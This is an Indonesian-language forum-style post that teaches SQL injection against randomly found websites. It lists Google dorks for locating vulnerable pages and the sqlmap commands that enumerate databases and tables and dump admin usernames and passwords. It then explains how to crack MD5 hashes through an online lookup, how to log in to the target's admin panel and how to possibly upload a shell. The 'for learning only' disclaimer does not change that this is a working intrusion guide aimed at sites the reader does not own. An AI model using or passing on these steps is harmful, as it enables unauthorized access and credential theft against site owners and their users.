hasashi_naiko ok anda bisa memulai sql injection lewat sqlmap link download nya di sini
:http://sqlmap.org/
nah bisa di test lewat dork ini:
product_info.php?products_id=
product_info.php?products_id=
product-list.php?category_id=
dan tinggal di pilih web mana
saya anggep dah ketemu ya
dan buka terminal
lalu ketik
sqlmap -u (target) --dbs
lalu jika ketemu database contoh
[] information_blabla
dan tinggal ketik
sqlmap -u (target.com) -D information_blabla --tables
dan biasanya terletak di sana tulisan admin_password
ketik saja
sqlmap -u (target.com) -D information_blabla -T admin_password --columns
dan hasil nya biasa nya ada
[*]users
[*]password
dan ketik saja
sqlmap -u (target.com) -D information_blabla -T admin_password -C users,password --dump
dan biasa nya ketemu
akun dan password ,jika password di hash/md5
seperti tulisan 083hde33dfnfkri44iqwon <--- (contoh password di md5)
cara tau isinya password yang masih di md5 cari di google :www.md5online.org
lalu di paste passwordnya dan enter
dan dapet passwordnya
jika mau di eksekusi website tinggal ke www.target.com/admin
masukan username admin dan password admin lalu enter
dan tadaaaaaaaa
masuk ke control panel nya dan bisa add news jika hoki bisa upload shell.
tujuan saya menulis ini hanya untuk pembelajaran jika kalian melakukan sesuatu dengan cara ini dan terjadi sesuatu yang tidak mengenakan jangan salah kan saya,karena bukan tanggung jawab saya
